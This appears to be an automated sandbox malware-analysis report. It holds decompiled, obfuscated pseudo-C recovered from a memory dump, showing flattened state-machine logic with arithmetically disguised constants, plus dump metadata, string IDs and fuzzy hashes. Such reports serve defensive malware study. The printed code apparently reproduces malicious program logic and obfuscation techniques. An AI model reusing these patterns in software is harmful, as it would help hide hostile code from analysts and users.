                                              							_t374 = E0022F39F(_v244, _v128, _t460 + 0x60,  &_v124, _v184, _v192, _v164, _t403, _v168);
                                              							_t403 = _v268;
                                              							_t470 = _t470 + 0x1c;
                                              							_t441 = _v236;
                                              							if(_t374 == 0) {
                                              								continue;
                                              							}
                                              							_t461 = 0x8f3e942;
                                              							_t403 = 1;
                                              							_v268 = 1;
                                              							L29:
                                              							if(_t461 == 0x33ec2607) {
                                              								L33:
                                              								return _v268;
                                              							}
                                              							while(1) {
                                              								L1:
                                              								_t441 = _v236;
                                              								goto L2;
                                              							}
                                              						}
                                              						if(_t461 == 0x2e332bc4) {
                                              							E00232674(_v252, _v136, _a4, _t441, _v144, _v224,  *_t468);
                                              							_t470 = _t470 + 0x14;
                                              							_t461 = 0x2452d659;
                                              							L9:
                                              							_t403 = _v268;
                                              							goto L1;
                                              						}
                                              						if(_t461 == 0x2efa85f7) {
                                              							_t377 = _a4 + 1;
                                              							if((_t377 & 0x0000000f) != 0) {
                                              								_t377 = (_t377 & 0xfffffff0) + 0x10;
                                              							}
                                              							 *((intOrPtr*)(_t401 + 4)) = _t377 + 0x74;
                                              							_push(_t403);
                                              							_push(_t403);
                                              							_t460 = E00228736( *((intOrPtr*)(_t401 + 4)));
                                              							 *_t401 = _t460;
                                              							if(_t460 == 0) {
                                              								goto L33;
                                              							} else {
                                              								_t317 = _t460 + 0x74; // 0x74
                                              								_t441 = _t317;
                                              								_v116 = _a4;
                                              								_t461 = 0x332cf2c2;
                                              								_t403 = _v268;
                                              								_v236 = _t317;
                                              								_v120 =  *((intOrPtr*)(_t401 + 4)) - 0x74;
                                              								continue;
                                              							}
                                              						}
                                              						if(_t461 != 0x332cf2c2) {
                                              							goto L29;
                                              						}
                                              						_t396 =  *0x23ca20; // 0x0
                                              						_t397 = E00231B49( &_v128, _v264, _t403,  *((intOrPtr*)(_t396 + 0x2c)), _t403, _v152, _v140);
                                              						_t470 = _t470 + 0x14;
                                              						asm("sbb esi, esi");
                                              						_t461 = ( ~_t397 & 0x0493a058) + 0x299f8b6c;
                                              						goto L9;
                                              					}
                                              					if(_t472 == 0) {
                                              						if(_t403 == 0) {
                                              							E0022F536(_v156, _v176, _v228,  *_t401);
                                              						}
                                              						goto L33;
                                              					}
                                              					if(_t461 == 0x405be48) {
                                              						_t461 = 0x2efa85f7;
                                              						goto L2;
                                              					}
                                              					if(_t461 == 0x8f3e942) {
                                              						_push(_t403);
                                              						_push(_t403);
                                              						E00225F43(_t403, _v128);
                                              						_t461 = 0x299f8b6c;
                                              						goto L9;
                                              					}
                                              					if(_t461 == 0x1e33600c) {
                                              						_v112 = 0x6c;
                                              						_t391 =  *0x23ca20; // 0x0
                                              						_t392 = E00228010( &_v108,  &_v112, _v188, _v240,  *((intOrPtr*)(_t391 + 0x24)),  *((intOrPtr*)(_t391 + 0x10)), _v256, _v204, _v180, _v172);
                                              						_t470 = _t470 + 0x20;
                                              						if(_t392 == 0) {
                                              							_t461 = 0x8f3e942;
                                              							goto L9;
                                              						}
                                              						_t416 =  &_v1;
                                              						_t448 = _t460;
                                              						do {
                                              							 *_t448 =  *_t416;
                                              							_t448 = _t448 + 1;
                                              							_t416 = _t416 - 1;
                                              						} while (_t416 >=  &_v96);
                                              						_t461 = 0x2e2d51e6;
                                              						goto L9;
                                              					}
                                              					if(_t461 != 0x2452d659) {
                                              						goto L29;
                                              					}
                                              					_t393 =  *0x23ca20; // 0x0
                                              					_t395 = E00230A3B(_v120, _v128, _v148, _v232, _v160, _t403,  &_v116, _v212, _v196, _t441, _v200, _t403,  *((intOrPtr*)(_t393 + 0x10)));
                                              					_t470 = _t470 + 0x2c;
                                              					asm("sbb esi, esi");
                                              					_t461 = ( ~_t395 & 0x153f76ca) + 0x8f3e942;
                                              					goto L9;
                                              				}
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: -;$>$K$PL$Q,L$Zb$[+$^)$l$s|${n$%$)$Q-.$Q-.$SeK
                                              • API String ID: 0-11970308
                                              • Opcode ID: 69ab67681eb7b7fdcdcbee6933835ac21522f86dfd2a7b25b157d9b27321d0eb
                                              • Instruction ID: 52362f0b4cf311df595d84b7f91e6aad1166f35bb71f31fe8bcb56937b1b24b2
                                              • Opcode Fuzzy Hash: 69ab67681eb7b7fdcdcbee6933835ac21522f86dfd2a7b25b157d9b27321d0eb
                                              • Instruction Fuzzy Hash: B51255725183809FD368CF65C989A4BFBF1BBC4314F108A2DF6D9862A0D7B59919CF42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 95%
                                              			E00221CFA(void* __edx, intOrPtr* _a4) {
                                              				intOrPtr _v4;
                                              				intOrPtr _v8;
                                              				intOrPtr _v12;
                                              				char _v16;
                                              				char _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				unsigned int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				signed int _v64;
                                              				signed int _v68;
                                              				signed int _v72;
                                              				signed int _v76;
                                              				signed int _v80;
                                              				signed int _v84;
                                              				signed int _v88;
                                              				signed int _v92;
                                              				signed int _v96;
                                              				signed int _v100;
                                              				signed int _v104;
                                              				signed int _v108;
                                              				signed int _v112;
                                              				signed int _v116;
                                              				signed int _v120;
                                              				signed int _v124;
                                              				signed int _v128;
                                              				signed int _v132;
                                              				signed int _v136;
                                              				signed int _v140;
                                              				unsigned int _v144;
                                              				signed int _v148;
                                              				signed int _v152;
                                              				signed int _v156;
                                              				signed int _v160;
                                              				signed int _v164;
                                              				signed int _v168;
                                              				signed int _v172;
                                              				signed int _v176;
                                              				signed int _v180;
                                              				signed int _v184;
                                              				signed int _v188;
                                              				signed int _v192;
                                              				signed int _v196;
                                              				signed int _v200;
                                              				signed int _v204;
                                              				signed int _v208;
                                              				signed int _v212;
                                              				signed int _v216;
                                              				signed int _v220;
                                              				signed int _v224;
                                              				signed int _v228;
                                              				void* __ecx;
                                              				void* _t496;
                                              				void* _t539;
                                              				intOrPtr _t544;
                                              				intOrPtr _t546;
                                              				signed int _t548;
                                              				signed int _t551;
                                              				intOrPtr _t552;
                                              				intOrPtr _t554;
                                              				signed int _t555;
                                              				intOrPtr _t562;
                                              				intOrPtr _t572;
                                              				void* _t574;
                                              				signed int _t577;
                                              				signed int _t578;
                                              				signed int _t579;
                                              				signed int _t580;
                                              				signed int _t581;
                                              				signed int _t582;
                                              				signed int _t583;
                                              				signed int _t584;
                                              				signed int _t585;
                                              				signed int _t586;
                                              				signed int _t587;
                                              				signed int _t588;
                                              				signed int _t589;
                                              				signed int _t590;
                                              				intOrPtr _t591;
                                              				intOrPtr _t592;
                                              				void* _t597;
                                              				intOrPtr _t599;
                                              				intOrPtr _t635;
                                              				intOrPtr _t639;
                                              				void* _t641;
                                              				signed int* _t653;
                                              				void* _t656;
                                              
                                              				_t575 = _a4;
                                              				_push(_a4);
                                              				_push(__edx);
                                              				E0022602B(_t496);
                                              				_v12 = 0x36bdff;
                                              				_t653 =  &(( &_v228)[3]);
                                              				_v8 = 0x3ff2a1;
                                              				_t639 = 0;
                                              				_v4 = 0;
                                              				_v132 = 0xebdb;
                                              				_t641 = 0x15e50797;
                                              				_t577 = 0x54;
                                              				_v132 = _v132 / _t577;
                                              				_v132 = _v132 | 0x22f60655;
                                              				_v132 = _v132 ^ 0x22f660d1;
                                              				_v120 = 0xef02;
                                              				_v120 = _v120 + 0xffff4354;
                                              				_v120 = _v120 + 0xfbd6;
                                              				_v120 = _v120 ^ 0x0001ae28;
                                              				_v52 = 0x7417;
                                              				_v52 = _v52 + 0x1179;
                                              				_v52 = _v52 ^ 0x00000590;
                                              				_v48 = 0x8f30;
                                              				_v48 = _v48 >> 0xf;
                                              				_v64 = 0xc7cd;
                                              				_v64 = _v64 << 0xc;
                                              				_v64 = _v64 ^ 0x0c7cd040;
                                              				_v140 = 0xc967;
                                              				_v140 = _v140 << 0xb;
                                              				_v140 = _v140 | 0xe06bf9c9;
                                              				_v140 = _v140 ^ 0x166bf9c9;
                                              				_v196 = 0x461e;
                                              				_v196 = _v196 | 0x6b692bd6;
                                              				_v196 = _v196 + 0xc0cf;
                                              				_v196 = _v196 + 0xffff0de4;
                                              				_v196 = _v196 ^ 0x6b6977c5;
                                              				_v180 = 0xfff7;
                                              				_t578 = 0x59;
                                              				_v180 = _v180 / _t578;
                                              				_t579 = 0x4d;
                                              				_v180 = _v180 * 0x18;
                                              				_v180 = _v180 | 0x58a6a9da;
                                              				_v180 = _v180 ^ 0x58a6c249;
                                              				_v128 = 0x9f16;
                                              				_v128 = _v128 ^ 0xdade8ffa;
                                              				_v128 = _v128 ^ 0x4c90ffe3;
                                              				_v128 = _v128 ^ 0x964ece00;
                                              				_v92 = 0xcecd;
                                              				_v92 = _v92 + 0x8237;
                                              				_v92 = _v92 / _t579;
                                              				_v92 = _v92 ^ 0x00006f99;
                                              				_v100 = 0x1088;
                                              				_v100 = _v100 << 8;
                                              				_v100 = _v100 << 3;
                                              				_v100 = _v100 ^ 0x0084674e;
                                              				_v108 = 0x5533;
                                              				_v108 = _v108 >> 9;
                                              				_v108 = _v108 | 0xd8fb4233;
                                              				_v108 = _v108 ^ 0xd8fb1bcd;
                                              				_v208 = 0xcae;
                                              				_v208 = _v208 / _t579;
                                              				_t580 = 0x13;
                                              				_v208 = _v208 / _t580;
                                              				_v208 = _v208 >> 0xa;
                                              				_v208 = _v208 ^ 0x00001a16;
                                              				_v216 = 0x40e3;
                                              				_v216 = _v216 | 0x810267c5;
                                              				_v216 = _v216 << 1;
                                              				_v216 = _v216 << 3;
                                              				_v216 = _v216 ^ 0x10267eee;
                                              				_v28 = 0xb673;
                                              				_t581 = 0x3e;
                                              				_v28 = _v28 / _t581;
                                              				_v28 = _v28 ^ 0x0000683f;
                                              				_v40 = 0x9279;
                                              				_v40 = _v40 + 0xffffeab6;
                                              				_v40 = _v40 ^ 0x000054a5;
                                              				_v204 = 0x1c40;
                                              				_v204 = _v204 + 0xffff1f7d;
                                              				_t582 = 0x50;
                                              				_v204 = _v204 / _t582;
                                              				_v204 = _v204 ^ 0x72bb6b9a;
                                              				_v204 = _v204 ^ 0x71887e03;
                                              				_v112 = 0xb897;
                                              				_v112 = _v112 + 0xffffdcba;
                                              				_v112 = _v112 | 0x14aad9bd;
                                              				_v112 = _v112 ^ 0x14aaad8a;
                                              				_v172 = 0xd85f;
                                              				_v172 = _v172 + 0xffff9181;
                                              				_t583 = 0x36;
                                              				_v172 = _v172 * 0x2e;
                                              				_v172 = _v172 + 0x3c74;
                                              				_v172 = _v172 ^ 0x00135ecd;
                                              				_v212 = 0x19f7;
                                              				_v212 = _v212 + 0xffff95e1;
                                              				_v212 = _v212 | 0x04fc32b0;
                                              				_v212 = _v212 << 0xa;
                                              				_v212 = _v212 ^ 0xfeffe01a;
                                              				_v36 = 0x7d37;
                                              				_v36 = _v36 | 0x20ef5b1a;
                                              				_v36 = _v36 ^ 0x20ef0402;
                                              				_v116 = 0xd595;
                                              				_v116 = _v116 / _t583;
                                              				_v116 = _v116 + 0xffffe49c;
                                              				_v116 = _v116 ^ 0xffffa94a;
                                              				_v160 = 0x5e14;
                                              				_v160 = _v160 | 0xdf0c29a2;
                                              				_v160 = _v160 ^ 0xe579e09e;
                                              				_v160 = _v160 + 0xffffde5a;
                                              				_v160 = _v160 ^ 0x3a753154;
                                              				_v68 = 0x52ff;
                                              				_v68 = _v68 >> 8;
                                              				_v68 = _v68 ^ 0x000014f4;
                                              				_v76 = 0x7879;
                                              				_t584 = 0x73;
                                              				_v76 = _v76 / _t584;
                                              				_v76 = _v76 ^ 0x0000054d;
                                              				_v72 = 0x594e;
                                              				_v72 = _v72 ^ 0x61e5003d;
                                              				_v72 = _v72 ^ 0x61e57443;
                                              				_v156 = 0xdc41;
                                              				_v156 = _v156 << 6;
                                              				_v156 = _v156 << 0x10;
                                              				_v156 = _v156 ^ 0x10402e5f;
                                              				_v152 = 0x2cab;
                                              				_v152 = _v152 << 0xc;
                                              				_v152 = _v152 ^ 0xa6d63634;
                                              				_v152 = _v152 ^ 0xa41cdbd3;
                                              				_v24 = 0xfca2;
                                              				_v24 = _v24 >> 0xd;
                                              				_v24 = _v24 ^ 0x000010c7;
                                              				_v96 = 0xe6c1;
                                              				_v96 = _v96 << 0xd;
                                              				_v96 = _v96 + 0xc19f;
                                              				_v96 = _v96 ^ 0x1cd8953a;
                                              				_v224 = 0x49a1;
                                              				_v224 = _v224 ^ 0xfe0521c0;
                                              				_v224 = _v224 + 0x1e0d;
                                              				_v224 = _v224 | 0x46707e16;
                                              				_v224 = _v224 ^ 0xfe759897;
                                              				_v228 = 0x2882;
                                              				_v228 = _v228 << 0x10;
                                              				_v228 = _v228 ^ 0x2e28bbbf;
                                              				_v228 = _v228 | 0x3bec92e5;
                                              				_v228 = _v228 ^ 0x3fee891d;
                                              				_v136 = 0x5ad;
                                              				_v136 = _v136 ^ 0x3d33a635;
                                              				_v136 = _v136 + 0xffff9ac4;
                                              				_v136 = _v136 ^ 0x3d335448;
                                              				_v104 = 0x3c69;
                                              				_v104 = _v104 + 0xf144;
                                              				_t585 = 0x19;
                                              				_v104 = _v104 * 0x1e;
                                              				_v104 = _v104 ^ 0x0023546a;
                                              				_v188 = 0xf300;
                                              				_v188 = _v188 / _t585;
                                              				_v188 = _v188 + 0xffffad26;
                                              				_v188 = _v188 | 0x8105dcb8;
                                              				_v188 = _v188 ^ 0xffffe238;
                                              				_v144 = 0x45c8;
                                              				_v144 = _v144 >> 0xe;
                                              				_v144 = _v144 + 0x45b6;
                                              				_v144 = _v144 ^ 0x000072cd;
                                              				_v192 = 0xd236;
                                              				_v192 = _v192 >> 0x10;
                                              				_t586 = 0x69;
                                              				_v192 = _v192 / _t586;
                                              				_v192 = _v192 ^ 0x176600d6;
                                              				_v192 = _v192 ^ 0x17663ad7;
                                              				_v200 = 0x1b90;
                                              				_v200 = _v200 >> 0xe;
                                              				_v200 = _v200 | 0x00032953;
                                              				_t587 = 0xe;
                                              				_v200 = _v200 * 0x71;
                                              				_v200 = _v200 ^ 0x016540c6;
                                              				_v32 = 0xa5b;
                                              				_v32 = _v32 / _t587;
                                              				_v32 = _v32 ^ 0x00002bda;
                                              				_v56 = 0xbe4e;
                                              				_v56 = _v56 + 0xffffe059;
                                              				_v56 = _v56 ^ 0x0000eaa3;
                                              				_v220 = 0x4321;
                                              				_v220 = _v220 ^ 0x3fa1daa1;
                                              				_v220 = _v220 + 0xffff309f;
                                              				_t588 = 0x24;
                                              				_v220 = _v220 / _t588;
                                              				_v220 = _v220 ^ 0x01c46047;
                                              				_v164 = 0x3944;
                                              				_v164 = _v164 + 0xffff1fd9;
                                              				_t589 = 0x2b;
                                              				_v164 = _v164 * 0x57;
                                              				_v164 = _v164 << 4;
                                              				_v164 = _v164 ^ 0xfc749d64;
                                              				_v148 = 0x7755;
                                              				_v148 = _v148 ^ 0x244775ea;
                                              				_v148 = _v148 | 0xcd3e82a6;
                                              				_v148 = _v148 ^ 0xed7f8152;
                                              				_v88 = 0x40ad;
                                              				_v88 = _v88 >> 0xf;
                                              				_v88 = _v88 ^ 0x000030bd;
                                              				_v80 = 0x9327;
                                              				_v80 = _v80 * 0x70;
                                              				_v80 = _v80 ^ 0x00406c8d;
                                              				_v176 = 0x8ba8;
                                              				_v176 = _v176 + 0x5748;
                                              				_v176 = _v176 + 0xffffe08a;
                                              				_v176 = _v176 + 0xffffcf91;
                                              				_v176 = _v176 ^ 0x0000bf1e;
                                              				_v124 = 0xe985;
                                              				_v124 = _v124 ^ 0x9cf6d459;
                                              				_v124 = _v124 + 0xffffb832;
                                              				_v124 = _v124 ^ 0x9cf5d440;
                                              				_v184 = 0xee13;
                                              				_v184 = _v184 / _t589;
                                              				_v184 = _v184 ^ 0x973ecc13;
                                              				_t590 = 0x6a;
                                              				_v184 = _v184 / _t590;
                                              				_v184 = _v184 ^ 0x016d24ef;
                                              				_v84 = 0xbcf1;
                                              				_v84 = _v84 ^ 0x64b03ea8;
                                              				_v84 = _v84 ^ 0x64b0e2a8;
                                              				_v60 = 0x8a4f;
                                              				_v60 = _v60 | 0x8c15d5a4;
                                              				_v60 = _v60 ^ 0x8c14dfef;
                                              				_v44 = 0x30ef;
                                              				_v44 = _v44 + 0xffffe2a4;
                                              				_v44 = _v44 ^ 0x00001380;
                                              				_v168 = 0xbe5e;
                                              				_v168 = _v168 << 0x10;
                                              				_v168 = _v168 | 0x5aa68a8d;
                                              				_v168 = _v168 + 0xffff34cf;
                                              				_v168 = _v168 ^ 0xfefdbf5d;
                                              				goto L1;
                                              				do {
                                              					while(1) {
                                              						L1:
                                              						_t656 = _t641 - 0x2e2ba50c;
                                              						if(_t656 > 0) {
                                              							break;
                                              						}
                                              						if(_t656 == 0) {
                                              							_push(_t590);
                                              							_push(_t590);
                                              							_t591 =  *0x23ca20; // 0x0
                                              							_t590 = _t591 + 0x18;
                                              							_t551 = E0022C46E(_t590, _v208, _v216, _v28, _v140 | _v64, _t590, _v40);
                                              							_t653 =  &(_t653[7]);
                                              							asm("sbb esi, esi");
                                              							_t641 = ( ~_t551 & 0xf61d5154) + 0x3b32afa9;
                                              							continue;
                                              						} else {
                                              							if(_t641 == 0xfdb1f24) {
                                              								_t552 =  *0x23ca20; // 0x0
                                              								_t554 =  *0x23ca20; // 0x0
                                              								_t555 = E0022F292(_v72, _v156,  *((intOrPtr*)(_t554 + 0x18)), _v152, _v20, _v24, _t590, _v16, _t552 + 0x24, _t590, _v96);
                                              								_t590 = _v224;
                                              								asm("sbb esi, esi");
                                              								_t641 = ( ~_t555 & 0x1a4c73ed) + 0x1af0d9d8;
                                              								E00239465(_t590, _v20, _v228);
                                              								_t653 =  &(_t653[0xa]);
                                              								goto L27;
                                              							} else {
                                              								if(_t641 == 0x15e50797) {
                                              									_push(_t590);
                                              									_t597 = 0x34;
                                              									_t562 = E00228736(_t597);
                                              									 *0x23ca20 = _t562;
                                              									_t590 = _t590;
                                              									if(_t562 != 0) {
                                              										_t641 = 0x2e2ba50c;
                                              										continue;
                                              									}
                                              								} else {
                                              									if(_t641 == 0x1af0d9d8) {
                                              										_t599 =  *0x23ca20; // 0x0
                                              										_t590 =  *(_t599 + 0x18);
                                              										E002287FA(_t590);
                                              										_t653 = _t653 - 0x10 + 0x10;
                                              										_t641 = 0x3b32afa9;
                                              										continue;
                                              									} else {
                                              										if(_t641 == 0x1f84fef1) {
                                              											_t572 =  *0x23ca20; // 0x0
                                              											_push(_t590);
                                              											_push(_t590);
                                              											E0023AB25(_t590,  *((intOrPtr*)(_t572 + 0x24)));
                                              											_t653 =  &(_t653[3]);
                                              											_t641 = 0x1af0d9d8;
                                              											continue;
                                              										} else {
                                              											if(_t641 != 0x2135b5bc) {
                                              												goto L27;
                                              											} else {
                                              												_t635 =  *0x23ca20; // 0x0
                                              												_t437 = _t635 + 0x2c; // 0x2c
                                              												_t590 = _t437;
                                              												_t574 = E00231A1F(_t590,  *((intOrPtr*)(_t635 + 0x18)), _v220, _v120, _v164, _v148, _t590, _v88, _t590, _v80);
                                              												_t653 =  &(_t653[8]);
                                              												if(_t574 != 0) {
                                              													_t639 = 1;
                                              												} else {
                                              													_t641 = 0x3151f296;
                                              													continue;
                                              												}
                                              											}
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              						L21:
                                              						return _t639;
                                              					}
                                              					if(_t641 == 0x315000fd) {
                                              						_t590 = _v36;
                                              						_t539 = E002275AE(_t590,  *_t575, _t590,  &_v20, _v44, _v116,  *((intOrPtr*)(_t575 + 4)),  &_v16, _v160, _v52, _v168 | _v60, _v68, _v76);
                                              						_t653 =  &(_t653[0xb]);
                                              						if(_t539 == 0) {
                                              							_t641 = 0x1af0d9d8;
                                              							goto L27;
                                              						} else {
                                              							_t641 = 0xfdb1f24;
                                              							goto L1;
                                              						}
                                              					} else {
                                              						if(_t641 == 0x3151f296) {
                                              							_t544 =  *0x23ca20; // 0x0
                                              							_push(_t590);
                                              							_push(_t590);
                                              							E0023AB25(_t590,  *((intOrPtr*)(_t544 + 0x10)));
                                              							_t653 =  &(_t653[3]);
                                              							_t641 = 0x1f84fef1;
                                              							goto L1;
                                              						} else {
                                              							if(_t641 == 0x353d4dc5) {
                                              								_t546 =  *0x23ca20; // 0x0
                                              								_t592 =  *0x23ca20; // 0x0
                                              								_t590 =  *(_t592 + 0x18);
                                              								_t548 = E002266C9(_t590, _v48, _v132, _t546 + 0x10, _v192, _v200, _v32, _v56);
                                              								_t653 =  &(_t653[6]);
                                              								asm("sbb esi, esi");
                                              								_t641 = ( ~_t548 & 0x01b0b6cb) + 0x1f84fef1;
                                              								goto L1;
                                              							} else {
                                              								if(_t641 != 0x3b32afa9) {
                                              									goto L27;
                                              								} else {
                                              									E0022F536(_v92, _v100, _v108,  *0x23ca20);
                                              								}
                                              							}
                                              						}
                                              					}
                                              					goto L21;
                                              					L27:
                                              				} while (_t641 != 0x5edb69a);
                                              				goto L21;
                                              			}
































































































                                              0x002223a4
                                              0x002223ac
                                              0x002223b4
                                              0x002223bc
                                              0x002223c7
                                              0x002223cf
                                              0x002223da
                                              0x002223ed
                                              0x002223f4
                                              0x002223ff
                                              0x00222407
                                              0x0022240f
                                              0x00222417
                                              0x0022241f
                                              0x00222427
                                              0x0022242f
                                              0x00222437
                                              0x0022243f
                                              0x00222447
                                              0x00222457
                                              0x0022245b
                                              0x00222467
                                              0x0022246a
                                              0x0022246e
                                              0x00222476
                                              0x00222481
                                              0x0022248c
                                              0x00222497
                                              0x002224a2
                                              0x002224ad
                                              0x002224b8
                                              0x002224c3
                                              0x002224ce
                                              0x002224d9
                                              0x002224e1
                                              0x002224e6
                                              0x002224ee
                                              0x002224f6
                                              0x002224f6
                                              0x002224fe
                                              0x002224fe
                                              0x002224fe
                                              0x002224fe
                                              0x00222504
                                              0x00000000
                                              0x00000000
                                              0x0022250a
                                              0x00222686
                                              0x00222687
                                              0x002226a7
                                              0x002226b1
                                              0x002226b4
                                              0x002226b9
                                              0x002226c0
                                              0x002226c8
                                              0x00000000
                                              0x00222510
                                              0x00222516
                                              0x00222620
                                              0x00222644
                                              0x00222657
                                              0x00222669
                                              0x0022266f
                                              0x00222677
                                              0x00222679
                                              0x0022267e
                                              0x00000000
                                              0x0022251c
                                              0x00222522
                                              0x002225f6
                                              0x002225fa
                                              0x002225fb
                                              0x00222600
                                              0x00222606
                                              0x00222609
                                              0x0022260f
                                              0x00000000
                                              0x0022260f
                                              0x00222528
                                              0x0022252a
                                              0x002225cf
                                              0x002225d5
                                              0x002225d8
                                              0x002225dd
                                              0x002225e0
                                              0x00000000
                                              0x00222530
                                              0x00222536
                                              0x002225a0
                                              0x002225a5
                                              0x002225a6
                                              0x002225aa
                                              0x002225af
                                              0x002225b2
                                              0x00000000
                                              0x00222538
                                              0x0022253e
                                              0x00000000
                                              0x00222544
                                              0x00222567
                                              0x0022256d
                                              0x0022256d
                                              0x00222573
                                              0x00222578
                                              0x0022257d
                                              0x0022282d
                                              0x00222583
                                              0x00222583
                                              0x00000000
                                              0x00222583
                                              0x0022257d
                                              0x0022253e
                                              0x00222536
                                              0x0022252a
                                              0x00222522
                                              0x00222516
                                              0x00222721
                                              0x0022272d
                                              0x0022272d
                                              0x002226d9
                                              0x002227fb
                                              0x00222802
                                              0x00222807
                                              0x0022280c
                                              0x00222818
                                              0x00000000
                                              0x0022280e
                                              0x0022280e
                                              0x00000000
                                              0x0022280e
                                              0x002226df
                                              0x002226e5
                                              0x00222796
                                              0x0022279b
                                              0x0022279c
                                              0x002227a0
                                              0x002227a5
                                              0x002227a8
                                              0x00000000
                                              0x002226eb
                                              0x002226f1
                                              0x00222744
                                              0x0022275b
                                              0x00222761
                                              0x00222764
                                              0x00222769
                                              0x00222770
                                              0x00222778
                                              0x00000000
                                              0x002226f3
                                              0x002226f9
                                              0x00000000
                                              0x002226ff
                                              0x0022271a
                                              0x00222720
                                              0x002226f9
                                              0x002226f1
                                              0x002226e5
                                              0x00000000
                                              0x0022281a
                                              0x0022281a
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: !C$3U$?h$Cta$D9$HT3=$HW$T1u:$[$i<$t<$0$@$uG$
                                              • API String ID: 0-1338720442
                                              • Opcode ID: 1baea8f5458796ebd1212e7ee3e70693c1d860a1bcf88851e46bbf23bf174e92
                                              • Instruction ID: 44c95fb7b7498e3c173a0b1aa24092676b7894679c473fd19e37eb4d277ef16b
                                              • Opcode Fuzzy Hash: 1baea8f5458796ebd1212e7ee3e70693c1d860a1bcf88851e46bbf23bf174e92
                                              • Instruction Fuzzy Hash: 3E424572508381DFE378CF65C98AA9BBBE1BBC4304F10891DE5D9962A0D7B58859CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 96%
                                              			E0023511B(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
                                              				char _v64;
                                              				char _v128;
                                              				signed int _v132;
                                              				intOrPtr _v136;
                                              				intOrPtr _v140;
                                              				intOrPtr* _v144;
                                              				char _v148;
                                              				signed int _v152;
                                              				signed int _v156;
                                              				signed int _v160;
                                              				signed int _v164;
                                              				signed int _v168;
                                              				unsigned int _v172;
                                              				signed int _v176;
                                              				signed int _v180;
                                              				signed int _v184;
                                              				signed int _v188;
                                              				signed int _v192;
                                              				signed int _v196;
                                              				signed int _v200;
                                              				signed int _v204;
                                              				signed int _v208;
                                              				signed int _v212;
                                              				signed int _v216;
                                              				signed int _v220;
                                              				signed int _v224;
                                              				signed int _v228;
                                              				signed int _v232;
                                              				signed int _v236;
                                              				signed int _v240;
                                              				signed int _v244;
                                              				signed int _v248;
                                              				signed int _v252;
                                              				signed int _v256;
                                              				signed int _v260;
                                              				signed int _v264;
                                              				signed int _v268;
                                              				signed int _v272;
                                              				signed int _v276;
                                              				signed int _v280;
                                              				signed int _v284;
                                              				signed int _v288;
                                              				signed int _v292;
                                              				signed int _v296;
                                              				signed int _v300;
                                              				signed int _v304;
                                              				unsigned int _v308;
                                              				signed int _v312;
                                              				signed int _v316;
                                              				signed int _t462;
                                              				intOrPtr* _t466;
                                              				signed int _t513;
                                              				signed int _t514;
                                              				signed int _t515;
                                              				signed int _t516;
                                              				signed int _t517;
                                              				signed int _t518;
                                              				signed int _t519;
                                              				signed int _t520;
                                              				intOrPtr _t521;
                                              				void* _t522;
                                              				void* _t525;
                                              				void* _t528;
                                              				intOrPtr* _t531;
                                              				signed int* _t532;
                                              
                                              				_t466 = __ecx;
                                              				_t532 =  &_v316;
                                              				_v140 = __edx;
                                              				_v144 = __ecx;
                                              				_v132 = _v132 & 0x00000000;
                                              				_v136 = 0x75b778;
                                              				_v308 = 0x9968;
                                              				_v308 = _v308 | 0x0cfdc455;
                                              				_v308 = _v308 + 0xdd4c;
                                              				_v308 = _v308 >> 3;
                                              				_v308 = _v308 ^ 0x019fad6f;
                                              				_v172 = 0xa03a;
                                              				_v172 = _v172 >> 8;
                                              				_v172 = _v172 ^ 0x00000391;
                                              				_v228 = 0x2930;
                                              				_v228 = _v228 << 0xc;
                                              				_v228 = _v228 ^ 0x02930f5f;
                                              				_v220 = 0x5883;
                                              				_v220 = _v220 + 0xffff1c36;
                                              				_v220 = _v220 ^ 0xffff6a37;
                                              				_v288 = 0x122f;
                                              				_v288 = _v288 << 0xf;
                                              				_v288 = _v288 + 0xd44b;
                                              				_v288 = _v288 << 0xa;
                                              				_v288 = _v288 ^ 0x6151757c;
                                              				_v260 = 0xc525;
                                              				_v260 = _v260 << 0xa;
                                              				_t522 = 0x1b8692db;
                                              				_t513 = 0x61;
                                              				_v260 = _v260 / _t513;
                                              				_v260 = _v260 ^ 0x00083ddd;
                                              				_v164 = 0x49a7;
                                              				_t514 = 0x7b;
                                              				_t462 = 0x17;
                                              				_v164 = _v164 * 0x76;
                                              				_v164 = _v164 ^ 0x002193f4;
                                              				_v300 = 0x59a2;
                                              				_v300 = _v300 ^ 0x3b27ac73;
                                              				_v300 = _v300 + 0xffff6ec5;
                                              				_v300 = _v300 + 0xffffb5fd;
                                              				_v300 = _v300 ^ 0x3b271e50;
                                              				_v252 = 0xb9af;
                                              				_v252 = _v252 >> 8;
                                              				_v252 = _v252 + 0xffffa108;
                                              				_v252 = _v252 ^ 0xfffffedf;
                                              				_v196 = 0x7b72;
                                              				_v196 = _v196 << 2;
                                              				_v196 = _v196 ^ 0x0001e8b2;
                                              				_v272 = 0x250d;
                                              				_v272 = _v272 * 0x16;
                                              				_v272 = _v272 >> 3;
                                              				_v272 = _v272 / _t514;
                                              				_v272 = _v272 ^ 0x0000021c;
                                              				_v156 = 0x4ea8;
                                              				_v156 = _v156 + 0xffff8c10;
                                              				_v156 = _v156 ^ 0xffffc687;
                                              				_v292 = 0x9a7d;
                                              				_v292 = _v292 << 1;
                                              				_v292 = _v292 / _t462;
                                              				_v292 = _v292 | 0x2e5edf0a;
                                              				_v292 = _v292 ^ 0x2e5e89f7;
